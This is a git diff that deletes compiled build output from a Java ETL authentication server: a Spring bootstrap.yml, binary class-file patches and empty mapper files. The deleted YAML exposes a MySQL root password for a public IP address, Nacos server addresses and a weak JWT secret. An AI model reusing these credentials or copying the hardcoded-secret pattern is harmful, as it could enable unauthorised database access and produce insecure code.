-
+
+
diff --git a/etl-auth/etl-auth-server/target/classes/bootstrap.yml b/etl-auth/etl-auth-server/target/classes/bootstrap.yml
deleted file mode 100644
index 26228d3..0000000
--- a/etl-auth/etl-auth-server/target/classes/bootstrap.yml
+++ /dev/null
@@ -1,51 +0,0 @@
-server:
- port: 9092
-spring:
- application:
- name: engine-auth
- redis:
- host: 127.0.0.1
- port: 6379
- datasource:
- driver-class-name: com.mysql.cj.jdbc.Driver
- url: jdbc:mysql://115.159.33.152:3306/etl
- username: root
- password: lzm@123
- mvc:
- pathmatch:
- matching-strategy: ant_path_matcher
- profiles:
- active: dev
- cloud:
- nacos:
- #注册服务
- discovery:
- server-addr: 182.254.221.163:8848
- namespace: 10a15e4b-3457-44dc-9378-cc25849f1872
- # 配置
- config:
- server-addr: 182.254.221.163:8848
- namespace: 10a15e4b-3457-44dc-9378-cc25849f1872
- # 配置文件格式
- file-extension: yml
- # 共享配置
- shared-configs:
- - application-${spring.profiles.active}.${spring.cloud.nacos.config.file-extension}
-logging:
- level:
- com.bwie: DEBUG
-auth:
- jwt:
- enabled: true # 是否开启JWT登录认证功能
- secret: passjava # JWT 私钥,用于校验JWT令牌的合法性
- expiration: 1800000 # JWT 令牌的有效期,用于校验JWT令牌的合法性,半个小时
- header: Authorization # HTTP 请求的 Header 名称,该 Header作为参数传递 JWT 令牌
- userParamName: username # 用户登录认证用户名参数名称
- pwdParamName: password # 用户登录认证密码参数名称
- useDefaultController: true # 是否使用默认的JwtAuthController
- skipValidUrl:
- - /auth/login
- - /auth/logout
-mybatis-plus:
- mapper-locations: classpath:/mapper/*mapper.xml
- typeAliasesPackage: com.auth.common.entity
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/EtlAuthServerApplication.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/EtlAuthServerApplication.class
deleted file mode 100644
index 839078c1e09176e721462d78dda22df59b871b1d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 1363
zcmbtU+fEZf82$!I3$+RsErOupu~g|M#&A@j3XWc2C_b05w95>`
z^@RoI9(tLX^8D=fR@*sV2;B6$G`2Dl
z8`4Nhb0vxB28BWhUHx6zEb2l
zwThx_%U-I5*Ub`KCBfOUHZlj%p-*tlaTx|dz2-?GbT`PLjqLL@z{-H|&t4#D$|#{wf2G$CS3wD*40SU8r=cyOQNd$8VR-SsBSsZD9s0Na
zt_UoxPoCGT_5EfKG@8~_r?fqOePDUoA#Fn|XJ7JH;-ri1Kt
nPQh^(DZLwXPm^?J6U^WyX6Ze*iK4+RgWCpo4CW2)8r=I0tIC8W
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/config/MD5s.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/config/MD5s.class
deleted file mode 100644
index b11995ff36a535e8a051a8340e00806ca96b17d3..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 2016
zcmbVNT~ixX7=8{U*|037iBO8QsI}5Sp$j6QP|@-w*pMnvw8gK@a+)kncH{0z2S(cq
z$2%|d#tUY=aJ=!t8+wy6cBVhT|D^bA0yMPHVa!a;8qd`^eQjD}eqt@u#GypBW<4N>
z7Q!Q=;f98f1!7kn*HIG!jj5g$fyk7%CIwp4jw>_eVpjUgR<=M+GVR$`Va4*D@V>{4
zsJs&hoKM?c(X`4cZwAu8Cwe&2B12%XUia`UA3H>GB23n%Hj?V8&h1)tz&MDh)yXO+
z@igUmSIJ!1zGmgk$&LMV+f(yLE={Z;-JHr-_jsO&R;eUiw!8oMNb44HuV0+mxbpU0
zwWW^q)LP=|s_JMj`&L+uR9%r@xD#w(Al1PxW~?HuXOE2Vq>%eV$IzRIUE8W>Kx@;(
zm(BkGjb_6&66j+wPHH}m*Kvj~@9@{a73NCwe3>_sPi{4$y^kOsR>kLd#;VLyc!ji4
zQ^0w2@z#V_@ftZa7Jm|~iM(HXchInfSh8_jq?3^yMAMghD~MH~EhHN=ePfZ%$di$1
z<4CMM)*k&Gna)UiY-mJl*Am!$u!Hzmyfa=wQ{*>vK8Akl5t@@m1uY@7rGisq@jY&T
z9W(PoO#HF?uz!1@uY%K$k)T;J8L8lMGRbx?Me8FpfnxlQtRo!MLDl*#*+Ip1dyAK(JM$3^^zH}Mm?@e3|t3q933Eh0|4
zA!=P9HHrzmK~0TFS!#E)R$Y8CUZS*-I1!|1*AP|@z2t>;{+YGC%y_q`(T9FYuaG~3
zsJ=^EO@panK*L~_7!>T=KNuCf?J~qjy%^XfPD70as=P(8A%ZpVJAR!{o#F)M@DZB+
E1L-*U%>V!Z
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/config/ShiroConfig.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/config/ShiroConfig.class
deleted file mode 100644
index ea6fe07a3ea1eeea5228d40f97a0320aedd47526..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 2813
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
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/service/PathService.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/service/PathService.class
deleted file mode 100644
index 88233ecb5a7d6062d1f1de5079f5c2f8219e424d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 321
zcmbVIOA5j;5S{p|)s1&>?<{mzaVZFbLQjy^K_g8f`4qjH3lHF-#H5OdOBXZq7VpR0
zAJ-cI%wU*6KY=uX0fRIbd&QkM#Nf0(@|t7C)gCv+kxG}XOD(bBT8f?aC@%$f!k#K`
zkLn09y*1k`DE7kbT2p2H$#1^@s6
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/service/PermissionService.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/service/PermissionService.class
deleted file mode 100644
index b26615f70b9a03a3d0996edb770e9759fd52cc42..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 466
zcmbVJO-sW-5S^*DvDJ#F{sX~Y+=E^urQk&n0*bkL+ayDrlI+&~DE6;;@CW##q?<(A
zLJxw6f%(|?=DpePpU*D*fFm(?&+i*eoNn-FW~&xY*sSGl6jP4;KRjgkFfF@K4xB=)-ZS2BGRf6r#&cVAys>
E8~pi_D*ylh
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/service/UserManageService.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/service/UserManageService.class
deleted file mode 100644
index 41fc9a076bcb1eb1eeeec8759e76a9660197dad4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 707
zcmb_a!Ab)$5S`T8wY6%!_zmsF0reoX2qFl=7QxjI$Zp4N>TXi9NwL4ygCF2WiL-58
ziXy0Z2+SmJX5M>~*SEzB0Gz>L0Q&(P1ke%C^aa__q)H1IcEiNvD7_ma2f5Km+9@~3
z2L@dxiSgR?dn-_;Vi`-+GBE|pslwchD8tza-cjK**XQ1mO0{&}k^uRiy$9h$&Ln11
zr+6DrC~^G@p4YbYXsH0_oY2E)<*3rq5JDcoVIH!B5sx8qtc3w+UUVjGaF!mp7DJ
zrnK&JT)HQqS1r37M7Emur9eREv*7|x%kp0;Xb2EcL2cA>pQ?7ai6`r_LF
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/service/impl/PathServiceImpl.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/service/impl/PathServiceImpl.class
deleted file mode 100644
index e8c95683b420d437f923e3b6339e14bae761a2f4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 888
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
Pii@b=`qp4kJ_Gy&<}M2R
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/util/SecurityUtils.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/util/SecurityUtils.class
deleted file mode 100644
index 8bb5d1a030eb6f5f745ab833210dd8ba2187f30b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 1126
zcma)5TTc@~6#k~AY`ZK4tAJWB+@VDoFQ_CnCQ2kE)=Mm6;@hx{?Z9@o&Q1yVPxM#l
z3!)GH0DqM6>}*XSHj$S(mp$j3Z_ao2*Y6)c0jyxvg@@}7Ci9pY!Zc=F3}M#A9Om;_
zaIuI=9@WGyIk@5ACd1%E6)N+HA-h=FVi;J9b|k|{U4`;Rx4kX(rq~WBQ>sV42)2Y)
zN!&{gn3jqeX6t^`=Avs_JeGQ2YTh*};0@__wK9iqD2Qte`KC0R(Vh$$YK!$Y&IXeByuy95ghMY-nF7*Q}Y1s*c
zFD<)QTE15Y4D%_+Q+M~JGu$x3-+L}Py{Wj3sH=UsuI$`SO<_5CwTEF8iF-0MX#!5R
z9ff4V*oe@?+|pS48!`+(rqM=PeH2DTp@U@)9AyueQFd_4!)@H5p*)d7OFik}u1BkI
zkAZgKJ{~Yk|6d)3(S%w0)|cD6(l-oqXOf7aK)P;7u_HD0M7qgENBAwtgQ(dg!4kW&
z+gk}MA+3y~;-~G7IbkB{0uHlNt^hsGA)L&lij@qN&38=
zqU%b>^pw>;W&bWhA9XQBe~?E%7mx)hfg+tF6mhaNV&tmdz`l}`!6==BHd(|u^1ZYG
zC7h?IfD0I-Owzng)fuwIYAO320~yqpj*3k_VcwJf>i
JD!Cb4`vYKK7s&ts
diff --git a/etl-auth/etl-auth-server/target/classes/com/auth/server/util/UserRealm.class b/etl-auth/etl-auth-server/target/classes/com/auth/server/util/UserRealm.class
deleted file mode 100644
index 81e2988a5b7b15ae30c6b3f1cb4b55bb0467ae26..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 3559
zcmbtXYjf087=F_3HfRrD2P|%w3we4!wa?0F($)M
zuoMXyrh+$;ifb_>rZH0oHD&&;*xf}*q9z-
z!&%3-Qs#)2vBqq($8lU=_bu09;5}i;v}ZZVaZgW~=UnfMHfHKhMjO`+-}R<7J-c(3bRDjyaf3jhWstozVhThHj7Oo+X}hFC+eh
z#qdofM6$kR2P}q7-A*yg%7lBs^ci@<^{fj4?nBPFE8%2wfL%}P#)PS5CM?g@GTE_7
z)9|$+@-eKmZuh#j%@-uw*-~mQ6uclv-S3-G>xCjk9wclnb@5LTnLH7p2=}&9Cn1iw
zl}a-`#XE>b&P9>1v2^nsf_TWC=CwxF^GwGV#UNqRyvD4WlI9{sp&Ba
zlu6s!jApo=$-zlj!I{#|W=$TNqhdS}Zl|Y+h{P$Q+kV+B26ex0+Bf5F)-z0QS=sLv
zo}20P+}Sby504RH0Bj#g2XLyfAf{`sfy3=xrEInkv!3z^PQ8YCCIOY
z))LDF53Yoz#o1V>DvFy&zVOJQBw*ZR`(uAQ&YOf+jFL3{Tx(=6Y%X&Pls3?&5~oEr
z5>&d)-!c-G)A2l;Bf%}iLsU(xVb?Z^<9>^Li>cQWiSS{_^iozP!>dZdisk}uIa_hb
zR*81xBqX$#Gbq`Ut8M|rcSAQ+U63pM$Y5Ktf*ZA#Xy;m`gbMR4zYhxIHSpXnvx4O=Pn#xC43qTZkkht4i}X4-y;;HVGb56q@g&wec@M}
zgc>3UzbYwBA%=i*?(?XyF36$uAQbUrTW#c*H2Ar^TC~{U7rPZ0gTJddKf*b}nO&b_
z3!gO366a{^O-SGJM+I6r3S*!iTR5tr0ou^crwFzNo5bd?QHdz$o;#=*y@|?!Swsfg
zZy_q-E~+{rZL!D<tq2FnKTppMw;J0h`2-SYMstT@s716IZ&x6n`#Fp0*ZKa`iO{}VQ25WC(onRCRq-^CMDWKj_;#VkMJ>^?V)NMq&ok({O
zA36hu2SapuhNrpKNrq93q6>S;LcuX~Q;|ygI?TO2jMPT<`^Ys)KdaD-r^s?Yzj`FDj!}yT1!qrK
-
-
-
-
-
diff --git a/etl-auth/etl-auth-server/target/classes/mapper/PermissionMapper.xml b/etl-auth/etl-auth-server/target/classes/mapper/PermissionMapper.xml
deleted file mode 100644
index c97efca..0000000
--- a/etl-auth/etl-auth-server/target/classes/mapper/PermissionMapper.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
diff --git a/etl-auth/etl-auth-server/target/classes/mapper/UserMangeMapper.xml b/etl-auth/etl-auth-server/target/classes/mapper/UserMangeMapper.xml
deleted file mode 100644
index f74141e..0000000
--- a/etl-auth/etl-auth-server/target/classes/mapper/UserMangeMapper.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
diff --git a/etl-auth/etl-auth-server/target/classes/static/index.html b/etl-auth/etl-auth-server/target/classes/static/index.html
deleted file mode 100644
index f67da0a..0000000
--- a/etl-auth/etl-auth-server/target/classes/static/index.html
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-hello word!!!
-this is a html page
-
-
diff --git a/etl-auth/etl-auth-server/target/production/etl-auth-common/com/auth/common/entity/PathPermission.class b/etl-auth/etl-auth-server/target/production/etl-auth-common/com/auth/common/entity/PathPermission.class
deleted file mode 100644
index 47b2a17e358f235eda6b99499c0fbf63b1062470..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
